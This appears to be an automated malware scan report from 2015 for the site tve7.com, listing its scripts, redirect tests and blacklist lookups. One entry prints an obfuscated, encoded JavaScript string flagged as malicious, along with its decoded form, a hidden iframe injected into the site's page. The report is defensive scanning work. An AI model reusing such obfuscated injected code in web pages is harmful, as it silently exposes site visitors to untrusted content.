Scanned pages/files
| Request | Server response | Status |
http://tve7.com/ | 200 OK Content-Length: 194754 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var I1O='==gCpkSKnw3JoQXasB3cucSZwlHdkFmQzwHMxgDN1MDRzwHZpNnQzw3YyNHfmZmZmZmZzIDf4IDN5kTNENDf2UDNzITMwUXe8dDRzwHZslGaDRmblBHchxXZwF2YzVmb1xXZtFmTnFGV5J0c05WZtVGbFRXZnxXMENDfkFWZoxHZpBnQzwHc0RHayIDfMJVV8J3bs92Yftmbpx2XkF2XyVWehx2Xy92crNWasNWQwwXZ0lmc3xnclJnclZWZyxXawFWeyVWdxpGfwRHdox3YyNHdldGfvZmbpx3dvh2c8ZWZyx3avxXbvNGfnJ2XkF2XyVWehx2Xy92crNWasNWQwwncvx2bj9Fd4VGdfRWYfJXZ5FGbfJ3bzt2Ypx2YBBDfy9GbvN2Xr5Was9Fd4VGdfJ3bzt2Ypx2YBBDfsJXdfRHb1FmZlR2Xy92crNWasNWQwwnclRmcvJ2XyVmbuFmYfJ3bzt2Ypx2YBBDfjJ3cwID Decoded script: <iframe name="banner" id="banner" src="http://tve7.com/TVE1integrator.php" width=300 height=250 frameborder="0" scrolling="no" ></iframe> Antivirus reports:
| ||
http://tve7.com/wp-includes/js/jquery/jquery.js?ver=1.11.3 | 200 OK Content-Length: 95977 Content-Type: text/javascript | clean |
http://tve7.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://tve7.com/wp-content/plugins/player/js/jquery-ui.min.js?ver=4.3.1 | 200 OK Content-Length: 228539 Content-Type: text/javascript | clean |
http://tve7.com/wp-content/plugins/player/js/jquery.transit.js?ver=4.3.1 | 200 OK Content-Length: 18741 Content-Type: text/javascript | clean |
http://tve7.com/wp-content/plugins/player/js/flash_detect.js?ver=4.3.1 | 200 OK Content-Length: 7049 Content-Type: text/javascript | clean |
http://tve7.com/wp-content/plugins/wp-automatic/js/main-front.js?ver=4.3.1 | 200 OK Content-Length: 888 Content-Type: text/javascript | clean |
http://sitelyhost.com/tve7/wp-content/themes/eVid/js/slider2.js | 200 OK Content-Length: 3084 Content-Type: text/javascript | clean |
http://www.youtube.com/player_api | 200 OK Content-Length: 744 Content-Type: application/javascript | clean |
https://f.vimeocdn.com/js/froogaloop2.min.js | 200 OK Content-Length: 1542 Content-Type: text/javascript | clean |
https://s0.2mdn.net/ads/studio/Enabler.js | 200 OK Content-Length: 97314 Content-Type: text/javascript | clean |
http://tve7.com/wp-content/themes/eVid/js/slider.js | 200 OK Content-Length: 3637 Content-Type: text/javascript | clean |
http://tve7.com/wp-content/themes/eVid/js/superfish.js | 200 OK Content-Length: 3812 Content-Type: text/javascript | clean |
http://tve7.com/wp-includes/js/comment-reply.min.js?ver=4.3.1 | 200 OK Content-Length: 757 Content-Type: text/javascript | clean |
http://tve7.com/wp-content/themes/eVid/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 | 200 OK Content-Length: 6755 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tve7.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Sep 2015 03:29:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://tve7.com/xmlrpc.php
GET / HTTP/1.1
Host: tve7.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Sep 2015 03:29:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://tve7.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: tve7.com
Referer: http://www.google.com/search?q=tve7.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tve7.com
Referer: http://www.google.com/search?q=tve7.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tve7.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tve7.com/
Result: tve7.com is not infected or malware details are not published yet.
Result: tve7.com is not infected or malware details are not published yet.